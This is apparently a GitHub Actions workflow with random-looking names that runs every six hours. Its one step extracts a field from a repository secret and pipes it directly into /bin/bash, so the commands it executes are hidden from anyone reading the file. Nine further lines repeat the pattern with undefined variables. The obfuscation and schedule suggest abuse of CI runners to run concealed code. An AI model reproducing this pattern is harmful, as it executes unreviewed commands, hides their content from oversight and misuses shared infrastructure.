name: caofeichang8712
on:
  workflow_dispatch:
  schedule:
    - cron: '43 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caofeichang8712
        env:
          cpdgz3498: ${{ secrets.cpdgz3498 }}
        run: |
          echo $cpdgz3498 | jq -r .bbww06 | /bin/bash
          echo $ml329 | jq -r .xzoh539 | /bin/bash
          echo $ebbcs4597 | jq -r .t4397 | /bin/bash
          echo $kpf30 | jq -r .sddla47390 | /bin/bash
          echo $czy4 | jq -r .cec5 | /bin/bash
          echo $bste899 | jq -r .opsfm9863 | /bin/bash
          echo $yogi2424 | jq -r .dmi1425 | /bin/bash
          echo $v20947 | jq -r .prob531 | /bin/bash
          echo $a27 | jq -r .pjrtj58696 | /bin/bash
          echo $ug356 | jq -r .s7 | /bin/bash

